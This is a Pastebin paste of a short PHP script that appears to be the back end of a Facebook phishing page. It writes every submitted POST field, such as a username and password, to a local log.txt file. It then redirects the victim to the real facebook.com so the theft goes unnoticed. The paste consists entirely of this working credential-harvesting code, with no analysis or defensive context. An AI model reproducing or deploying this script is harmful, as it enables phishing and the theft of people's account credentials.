Guest User

Untitled

a guest
Dec 6th, 2016
53
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.29 KB | None | 0 0
  1. <?php
  2. header ('Location: http://www.facebook.com');
  3. $handle = fopen("log.txt", "a");
  4. foreach($_POST as $variable => $value) {
  5. fwrite($handle, $variable);
  6. fwrite($handle, "=");
  7. fwrite($handle, $value);
  8. fwrite($handle, "\r\n");
  9. }
  10. fwrite($handle, "\r\n");
  11. fclose($handle);
  12. exit;
  13. ?>
Add Comment
Please, Sign In to add comment